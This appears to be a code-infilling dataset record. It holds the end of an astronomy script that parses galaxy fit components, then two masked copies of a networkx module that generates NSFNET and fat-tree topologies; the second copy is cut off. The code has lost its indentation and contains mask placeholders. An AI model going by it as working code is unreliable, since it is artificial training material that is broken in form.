from reading.ellipseOutput import readEllipseOutput
def readInputModel(txt, equivalentAxisFit, Settings):
psfwing_02pxscale_datatab = None
psfwing_logscale_datatab = None
componentslist = []
params = Parameters()
data = open(txt)
for line in data:
if (line[0] != '#'):
comp = Component()
comp.number = int(line.split()[0])
comp.name = str(line.split()[1])
#components with 4 parameters
if (comp.name == 'ferrer'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # r_out
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, 4.0, None) # alpha
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, 4.0, None)
p4 = (par4name, float(line.split()[8]), True, 0.01, 1.999, None) # beta
if (line.split()[9] == 'False'):
p4 = (par4name, float(line.split()[8]), False, 0.01, 1.999, None)
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
if (comp.name == 'tsersic'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
par4name = 'par4_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # r_e
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_e
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, 20.0, None) # n
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, 20.0, None)
p4 = (par4name, float(line.split()[8]), True, 0.01, None, None) # r_out
if (line.split()[9] == 'False'):
p4 = (par4name, float(line.split()[8]), False, 0.01, None, None)
comp.parameters.add_many(p1, p2, p3, p4)
params.add_many(p1, p2, p3, p4)
componentslist.append(comp)
#components with 3 parameters
if (comp.name == 'sersic'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # r_e
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_e
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, 20.0, None) # n
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, 20.0, None)
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
if (comp.name == 'tdisc' or comp.name == 'gring'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
par3name = 'par3_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # h # fwhm
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0 # mu_0
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
p3 = (par3name, float(line.split()[6]), True, 0.01, None, None) # r_out # r_0
if (line.split()[7] == 'False'):
p3 = (par3name, float(line.split()[6]), False, 0.01, None, None)
comp.parameters.add_many(p1, p2, p3)
params.add_many(p1, p2, p3)
componentslist.append(comp)
#components with two parameters
elif (comp.name == 'gaussian' or comp.name == 'disc'):
par1name = 'par1_' + str(line.split()[0])
par2name = 'par2_' + str(line.split()[0])
p1 = (par1name, float(line.split()[2]), True, 0.01, None, None) # h or fwhm ..
if (line.split()[3] == 'False'):
p1 = (par1name, float(line.split()[2]), False, 0.01, None, None)
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0 or mag
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
comp.parameters.add_many(p1, p2)
params.add_many(p1, p2)
componentslist.append(comp)
#components with one parameter
elif (comp.name == 'psf' or comp.name == 'psfwing'):
par2name = 'par2_' + str(line.split()[0])
p2 = (par2name, float(line.split()[4]), True, None, 35.0, None) # mu_0 or mag
if (line.split()[5] == 'False'):
p2 = (par2name, float(line.split()[4]), False, None, 35.0, None)
comp.parameters.add_many(p2)
params.add_many(p2)
componentslist.append(comp)
if (comp.name == 'psfwing'):
#psfwing_02pxscale_datatab = readEllipseOutput('PSFtinytim_centered_resc_linscale05px.ell')
psfwing_02pxscale_datatab = readEllipseOutput('star_02pxscale.ell')
psfwing_02pxscale_datatab['sma'] = psfwing_02pxscale_datatab['sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_02pxscale_datatab['sma'] = psfwing_02pxscale_datatab['sma'] * np.sqrt(1 - psfwing_02pxscale_datatab['ellip'])
#if minorAxisFit:
# psfwing_02pxscale_datatab['sma'] = psfwing_02pxscale_datatab['sma'] * (1 - psfwing_02pxscale_datatab['ellip'])
psfwing_02pxscale_datatab['intens'] = psfwing_02pxscale_datatab['intens'] / Settings.pxlToArcsec**2
psfwing_02pxscale_datatab['intens'] = psfwing_02pxscale_datatab['intens'] / max(psfwing_02pxscale_datatab['intens'])
#psfwing_logscale_datatab = readEllipseOutput('PSFtinytim_centered_resc_logscale.ell')
psfwing_logscale_datatab = readEllipseOutput('star_logscale.ell')
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab['sma'] * Settings.pxlToArcsec
if equivalentAxisFit:
psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab['sma'] * np.sqrt(1 - psfwing_logscale_datatab['ellip'])
#if minorAxisFit:
# psfwing_logscale_datatab['sma'] = psfwing_logscale_datatab['sma'] * (1 - psfwing_logscale_datatab['ellip'])
psfwing_logscale_datatab['intens'] = psfwing_logscale_datatab['intens'] / Settings.pxlToArcsec**2
psfwing_logscale_datatab['intens'] = psfwing_logscale_datatab['intens'] / max(psfwing_logscale_datatab['intens'])
return componentslist, params, psfwing_02pxscale_datatab, psfwing_logscale_datatab
| null | [
0,
1,
2,
3
] |
651 | 4cf2829282cb0a1673e741f78f17ce27a2817ff2 | <mask token>
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
indexing purposes when using Demand class. This is useful where want to
use the demand class but not necessarily with a carefully crafted networkx
graph that accurately mimics the network you will use for the demands
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
rack ids, values are list of end points. If None, assume there is not
clustering/rack system in the network where have different end points
in different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
Returns:
eps (list): List of endpoints.
"""
eps = []
for node in list(network.nodes):
if ep_label in node:
eps.append(node)
return eps
def gen_fat_tree(k=4, L=2, n=4, ep_label='server', rack_label='rack',
edge_label='edge', aggregate_label='agg', core_label='core',
num_channels=2, server_to_rack_channel_capacity=500,
rack_to_edge_channel_capacity=1000, edge_to_agg_channel_capacity=1000,
agg_to_core_channel_capacity=2000, rack_to_core_channel_capacity=2000,
show_fig=False):
"""Generates a perfect fat tree (i.e. all layers have switches with same radix/number of ports).
Top layer is always core (spine) switch layer, bottom layer is always
ToR (leaf) layer.
L must be either 2 (core, ToR) or 4 (core, agg, edge, ToR)
N.B. L=2 is commonly referred to as '2-layer Clos' or 'Clos' or 'spine-leaf' topology
Resource for building (scroll down to summary table with equations):
https://packetpushers.net/demystifying-dcn-topologies-clos-fat-trees-part2/
Another good resource for data centre topologies etc. in general:
https://www.oreilly.com/library/view/bgp-in-the/9781491983416/ch01.html#:~:text=The%20most%20common%20routing%20protocol,single%20data%20center%2C%20as%20well.
Parameters of network:
- number of core (spine) switches = (k/2)^(L/2) (top layer)
- number of edge switches (if L=4) = (k^2)/2
- number of agg switches (if L=4) = (k^2)/2
- number of pods (if L=4) (pod is a group of agg and/or edge switches) = 2*(k/2)^(L-2)
- number of ToR (leaf) switches (racks) = 2*(k/2)^(L-1) (bottom layer)
- number of server-facing ToR 'host' ports = 2*(k/2)^2 (can have multiple servers connected to same host port, & can oversubscribe)
- number of servers = number ToR switches * n
Args:
k (int): Number of ports (links) on each switch (both up and down).
L (int): Number of layers in the fat tree.
n (int): Number of server per rack.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
edge_label (str,int): Label to assign to edge switch nodes
aggregate_label (str,int): Label to assign to edge switch nodes
core_label (str,int): Label to assign to core switch nodes
num_channels (int, float): Number of channels on each link in network
server_to_edge_channel_capacity (int,float): Byte capacity per channel
edge_to_agg_channel_capacity (int,float): (if L==4) Byte capacity per channel
agg_to_core_channel_capacity (int,float): (if L==4) Byte capacity per channel
rack_to_core_channel_capacity (int,float): (if L==2) Byte capacity per channel
Returns:
networkx graph: network object
"""
if L != 2 and L != 4:
raise Exception(
'L must be 2 (ToR layer, core layer) or 4 (ToR layer, edge layer, agg layer, core layer), but is {}.'
.format(L))
if k % 2 != 0:
raise Exception(
'k must be even since, in perfect fat tree, have equal number of up and down ports on each switch, but is {}.'
.format(k))
channel_names = gen_channel_names(num_channels)
if L == 2:
node_labels = [ep_label, rack_label, core_label]
else:
node_labels = [ep_label, rack_label, edge_label, aggregate_label,
core_label]
num_cores = int((k / 2) ** (L / 2))
num_aggs = int(k ** 2 / 2)
num_edges = int(k ** 2 / 2)
num_pods = int(2 * (k / 2) ** (L - 2))
num_racks = int(2 * (k / 2) ** (L - 1))
num_servers = int(num_racks * n)
cores = [(core_label + '_' + str(i)) for i in range(num_cores)]
aggs = [(aggregate_label + '_' + str(i)) for i in range(num_aggs)]
edges = [(edge_label + '_' + str(i)) for i in range(num_edges)]
racks = [(rack_label + '_' + str(i)) for i in range(num_racks)]
servers = [(ep_label + '_' + str(i)) for i in range(num_servers)]
core_layer = nx.Graph()
rack_layer = nx.Graph()
core_layer.add_nodes_from(cores)
rack_layer.add_nodes_from(racks)
fat_tree_network = nx.compose(core_layer, rack_layer)
if L == 2:
rack_iterator = iter(racks)
for rack in racks:
core_iterator = iter(cores)
for up_port in range(int(k / 2)):
core = next(core_iterator)
fat_tree_network.add_edge(rack, core)
add_edge_capacity_attrs(fat_tree_network, (rack, core),
channel_names, rack_to_core_channel_capacity)
else:
num_pods = int(k)
pods = [[] for i in range(num_pods)]
prev_iter = 0
for pod_iter in range(len(pods)):
curr_iter = int(prev_iter + k / 2)
pods[pod_iter].append(edges[prev_iter:curr_iter])
pods[pod_iter].append(aggs[prev_iter:curr_iter])
prev_iter = curr_iter
pod_labels = [('pod_' + str(i)) for i in range(num_pods)]
pods_dict = {tuple([pod]): nx.Graph() for pod in pod_labels}
for pod_iter in range(num_pods):
key = 'pod_' + str(pod_iter),
pod_edges = pods[pod_iter][0]
pod_aggs = pods[pod_iter][1]
pods_dict[key].add_nodes_from(pod_edges)
pods_dict[key].add_nodes_from(pod_aggs)
for pod_edge in pod_edges:
for pod_agg in pod_aggs:
pods_dict[key].add_edge(pod_agg, pod_edge)
add_edge_capacity_attrs(pods_dict[key], (pod_agg,
pod_edge), channel_names, edge_to_agg_channel_capacity)
pod_networks = list(pods_dict.values())
for pod_iter in range(num_pods):
fat_tree_network = nx.compose(fat_tree_network, pod_networks[
pod_iter])
for pod_iter in range(num_pods):
pod_aggs = pods[pod_iter][1]
core_iterator = iter(cores)
for pod_agg in pod_aggs:
while fat_tree_network.degree[pod_agg] < k:
core = next(core_iterator)
fat_tree_network.add_edge(core, pod_agg)
add_edge_capacity_attrs(fat_tree_network, (core,
pod_agg), channel_names, agg_to_core_channel_capacity)
rack_iterator = iter(racks)
for pod_iter in range(num_pods):
pod_edges = pods[pod_iter][0]
for pod_edge in pod_edges:
while fat_tree_network.degree[pod_edge] < k:
rack = next(rack_iterator)
fat_tree_network.add_edge(pod_edge, rack)
add_edge_capacity_attrs(fat_tree_network, (pod_edge,
rack), channel_names, rack_to_edge_channel_capacity)
racks_dict = {rack: [] for rack in racks}
server_iterator = iter(servers)
for rack in racks:
for _ in range(n):
server = next(server_iterator)
fat_tree_network.add_edge(rack, server)
add_edge_capacity_attrs(fat_tree_network, (rack, server),
channel_names, server_to_rack_channel_capacity)
racks_dict[rack].append(server)
max_nw_capacity = (num_servers * num_channels *
server_to_rack_channel_capacity / 2)
fat_tree_network.graph['endpoints'] = servers
init_global_network_attrs(fat_tree_network, max_nw_capacity,
num_channels, ep_link_capacity=server_to_rack_channel_capacity *
num_channels, endpoint_label=ep_label, node_labels=node_labels,
topology_type='fat_tree', racks_dict=racks_dict)
if show_fig:
plot_network(fat_tree_network, show_fig=True)
return fat_tree_network
def init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity, endpoint_label='server', topology_type='unknown',
node_labels=['server'], racks_dict=None):
"""Initialises the standard global network attributes of a given network.
Args:
network (obj): NetworkX object.
max_nw_capacity (int/float): Maximum rate at which info can be reliably
transmitted over the network (sum of all link capacities).
num_channels (int): Number of channels on each link in network.
topology_type (str): Label of network topology (e.g. 'fat_tree').
node_labels (list): Label classes assigned to network nodes
(e.g. ['server', 'rack', 'edge']).
racks_dict (dict): Which servers/endpoints are in which rack. If None,
assume do not have rack system where have multiple servers in one
rack.
"""
network.graph['endpoint_label'] = endpoint_label
network.graph['num_channels_per_link'] = num_channels
network.graph['ep_link_capacity'] = ep_link_capacity
network.graph['ep_link_port_capacity'] = ep_link_capacity / 2
network.graph['max_nw_capacity'] = max_nw_capacity
network.graph['curr_nw_capacity_used'] = 0
network.graph['num_active_connections'] = 0
network.graph['total_connections_blocked'] = 0
network.graph['node_labels'] = node_labels
network.graph['topology_type'] = topology_type
network.graph['channel_names'] = gen_channel_names(num_channels)
if racks_dict is not None:
_racks_dict = {}
for key, val in racks_dict.items():
_racks_dict[str(key)] = []
for v in val:
_racks_dict[str(key)].append(str(v))
network.graph['rack_to_ep_dict'] = _racks_dict
else:
network.graph['rack_to_ep_dict'] = None
if racks_dict is not None:
ep_to_rack_dict = {}
for key, val in _racks_dict.items():
for v in val:
if v not in ep_to_rack_dict.keys():
ep_to_rack_dict[v] = key
network.graph['ep_to_rack_dict'] = ep_to_rack_dict
else:
network.graph['ep_to_rack_dict'] = None
<mask token>
def add_edge_capacity_attrs(network, edge, channel_names, channel_capacity,
bidirectional_links=True):
"""Adds channels and corresponding max channel bytes to single edge in network.
Args:
network (networkx graph): Network containing edges to whiich attrs will
be added.
edge (tuple): Node-node edge pair.
channel_names (list): List of channel names to add to edge.
channel_capacity (int,float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}}}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity}}
nx.set_edge_attributes(network, attrs)
def add_edges_capacity_attrs(network, edges, channel_names,
channel_capacity, bidirectional_links=True):
"""Adds channels & max channel capacitys to single edge in network.
To access e.g. the edge going from node 0 to node 1 (edge (0, 1)), you
would index the network with network[0][1]
To access e.g. the channel_1 attribute of this particular (0, 1) edge, you
would do network[0][1]['channels']['channel_1']
OR
if bidirectional_links, you do network[0][1]['0_to_1_port']['channels']['channel_1']
or network[0][1]['1_to_0_port']['channels']['channel_1] depending on which direction
of the link you want to access.
Args:
network (networkx graph): Network containing edges to which attrs will
be added.
edges (list): List of node pairs in tuples.
channel_names (list of str): List of channel names to add to edge.
channel_capacity (int, float): Capacity to allocate to each channel.
bidirectional_links (bool): If True, each link has capacity split equally
between src and dst port. I.e. all links have a src and dst port
which are treated separately to incoming and outgoing traffic to and
from given node (switch or server).
"""
if bidirectional_links:
attrs = {edge: {'{}_to_{}_port'.format(edge[0], edge[1]): {
'channels': {channel: (channel_capacity / 2) for channel in
channel_names}, 'max_channel_capacity': channel_capacity / 2},
'{}_to_{}_port'.format(edge[1], edge[0]): {'channels': {channel:
(channel_capacity / 2) for channel in channel_names},
'max_channel_capacity': channel_capacity / 2}} for edge in edges}
else:
attrs = {edge: {'channels': {channel: channel_capacity for channel in
channel_names}, 'max_channel_capacity': channel_capacity} for
edge in edges}
nx.set_edge_attributes(network, attrs)
def get_node_type_dict(network, node_types=[]):
"""Gets dict where keys are node types, values are list of nodes for each node type in graph."""
network_nodes = []
for network_node in network.nodes:
network_nodes.append(network_node)
network_nodes_dict = {node_type: [] for node_type in node_types}
for n in network_nodes:
for node_type in node_types:
if node_type in n:
network_nodes_dict[node_type].append(n)
else:
pass
return network_nodes_dict
def get_fat_tree_positions(net, width_scale=500, height_scale=10):
"""Gets networkx positions of nodes in fat tree network for plotting."""
pos = {}
node_type_dict = get_node_type_dict(net, net.graph['node_labels'])
node_types = list(node_type_dict.keys())
heights = {}
widths = {}
h = iter([1, 2, 3, 4, 5])
for node_type in node_types:
heights[node_type] = next(h)
widths[node_type] = 1 / (len(node_type_dict[node_type]) + 1)
idx = 0
for node in node_type_dict[node_type]:
pos[node] = (idx + 1) * widths[node_type] * width_scale, heights[
node_type] * height_scale
idx += 1
return pos
<mask token>
def plot_network(network, draw_node_labels=True, ep_label='server',
network_node_size=2000, font_size=30, linewidths=1, fig_scale=2,
path_to_save=None, show_fig=False):
"""Plots networkx graph.
Recognises special fat tree network and applies appropriate node positioning,
labelling, colouring etc.
Args:
network (networkx graph): Network object to be plotted.
draw_node_labels (bool): Whether or not to draw node labels on plot.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
network_node_size (int,float): Size of plotted nodes.
font_size (int,float): Size of of font of plotted labels etc.
linewidths (int,float): Width of edges in network.
fig_scale (int,float): Scaling factor to apply to plotted network.
path_to_save (str): Path to directory (with file name included) in which
to save generated plot. E.g. path_to_save='data/my_plot'
show_fig (bool): Whether or not to plot and show fig. If True, will
return and display fig.
Returns:
matplotlib.figure.Figure: node distribution plotted as a 2d matrix.
"""
net_node_positions = init_network_node_positions(copy.deepcopy(network))
fig = plt.figure(figsize=[15 * fig_scale, 15 * fig_scale])
pos = {}
network_nodes = []
network_nodes_dict = get_node_type_dict(network, network.graph[
'node_labels'])
for nodes in list(network_nodes_dict.values()):
for network_node in nodes:
pos[network_node] = net_node_positions[network_node]
node_colours = iter(['#25c44d', '#36a0c7', '#e8b017', '#6115a3', '#160e63']
)
for node_type in network.graph['node_labels']:
nx.draw_networkx_nodes(network, pos, nodelist=network_nodes_dict[
node_type], node_size=network_node_size, node_color=next(
node_colours), linewidths=linewidths, label=node_type)
if draw_node_labels:
nx.draw_networkx_labels(network, pos, font_size=font_size,
font_color='k', font_family='sans-serif', font_weight='normal',
alpha=1.0)
fibre_links = list(network.edges)
nx.draw_networkx_edges(network, pos, edgelist=fibre_links, edge_color=
'k', width=3, label='Fibre link')
if path_to_save is not None:
tools.pickle_data(path_to_save, fig)
if show_fig:
plt.show()
return fig
<mask token>
| <mask token>
def gen_arbitrary_network(num_eps, ep_label=None, ep_capacity=12500,
num_channels=1, racks_dict=None, topology_type=None):
"""Generates an arbitrary network with num_eps nodes labelled as ep_label.
Note that no edges are formed in this network; it is purely for ep name
indexing purposes when using Demand class. This is useful where want to
use the demand class but not necessarily with a carefully crafted networkx
graph that accurately mimics the network you will use for the demands
Args:
num_eps (int): Number of endpoints in network.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
ep_capacity (int, float): Byte capacity per end point channel.
num_channels (int, float): Number of channels on each link in network.
racks_dict (dict): Mapping of which end points are in which racks. Keys are
rack ids, values are list of end points. If None, assume there is not
clustering/rack system in the network where have different end points
in different clusters/racks.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(num_eps)])
if ep_label is None:
servers = [str(i) for i in range(num_eps)]
else:
servers = [(ep_label + '_' + str(i)) for i in range(num_eps)]
relabel_mapping = {node: label for node, label in zip(range(num_eps),
servers)}
network = nx.relabel_nodes(network, relabel_mapping)
eps = []
for node in list(network.nodes):
try:
if ep_label in node:
eps.append(node)
except TypeError:
eps.append(node)
network.graph['endpoints'] = eps
max_nw_capacity = num_eps * ep_capacity * num_channels / 2
if topology_type is None:
topology_type = 'arbitrary_endpoints_{}_chancap_{}_channels_{}'.format(
num_eps, ep_capacity, num_channels)
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=ep_capacity * num_channels, endpoint_label=
ep_label, node_labels=[ep_label], racks_dict=racks_dict,
topology_type=topology_type)
return network
def gen_nsfnet_network(ep_label='server', rack_label='rack', N=0,
num_channels=2, server_to_rack_channel_capacity=1,
rack_to_rack_channel_capacity=10, show_fig=False):
"""Generates the standard 14-node NSFNET topology (a U.S. core network).
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
N (int): Number of servers per rack. If 0, assume all nodes in nsfnet
are endpoints
num_channels (int,float): Number of channels on each link in network.
server_to_rack_channel_capacity (int,float): Byte capacity per channel
between servers and ToR switch.
rack_to_rack_channel_capacity (int,float): Byte capacity per channel between racks.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
channel_names = gen_channel_names(num_channels)
network = nx.Graph()
node_pair_list = [[0, 1], [0, 3], [0, 2], [1, 2], [1, 7], [3, 8], [3, 4
], [3, 6], [4, 5], [4, 5], [5, 2], [5, 13], [5, 12], [6, 7], [7, 10
], [8, 11], [8, 9], [9, 10], [9, 12], [10, 11], [10, 13], [11, 12]]
if N == 0:
label = ep_label
else:
label = rack_label
for idx in range(len(node_pair_list)):
node_pair_list[idx][0] = label + '_' + str(node_pair_list[idx][0])
node_pair_list[idx][1] = label + '_' + str(node_pair_list[idx][1])
for edge in node_pair_list:
network.add_edge(*tuple(edge))
if N == 0:
racks_dict = None
else:
i = 0
racks_dict = {rack: [] for rack in range(14)}
for rack in range(14):
for server in range(N):
racks_dict[rack].append(ep_label + '_' + str(i))
network.add_edge(ep_label + '_' + str(i), rack_label + '_' +
str(rack))
i += 1
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
rack_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * rack_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label, rack_label],
topology_type='14_node_nsfnet', racks_dict=racks_dict)
if show_fig:
plot_network(network, show_fig=True)
return network
def gen_simple_network(ep_label='server', num_channels=2,
server_to_rack_channel_capacity=500, show_fig=False):
"""Generates very simple 5-node topology.
Args:
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
ep_label appended to the start of their label (e.g. 'server_0', 'server_1', ...).
num_channels (int,float): Number of channels on each link in network.
channel_capacity (int,float): Byte capacity per channel.
show_fig (bool): Whether or not to plot and show fig. If True, will
display fig.
Returns:
networkx graph: network object
"""
network = nx.Graph()
network.add_nodes_from([node for node in range(5)])
network.add_edges_from([(0, 1), (0, 2), (1, 2), (2, 4), (4, 3), (3, 1)],
weight=1)
servers = [(ep_label + '_' + str(i)) for i in range(5)]
relabel_mapping = {node: label for node, label in zip(range(5), servers)}
network = nx.relabel_nodes(network, relabel_mapping)
channel_names = gen_channel_names(num_channels)
edges = [edge for edge in network.edges]
add_edges_capacity_attrs(network, edges, channel_names,
server_to_rack_channel_capacity)
network.graph['endpoints'] = get_endpoints(network, ep_label)
max_nw_capacity = len(network.edges
) * num_channels * server_to_rack_channel_capacity / 2
init_global_network_attrs(network, max_nw_capacity, num_channels,
ep_link_capacity=server_to_rack_channel_capacity * num_channels,
endpoint_label=ep_label, node_labels=[ep_label], topology_type=
'5_node_simple_network')
if show_fig:
plot_network(network, show_fig=True)
return network
def get_endpoints(network, ep_label):
"""Gets list of endpoints of network.
Args:
network (networkx graph): Networkx object.
ep_label (str,int,float): Endpoint label (e.g. 'server'). All endpoints will have
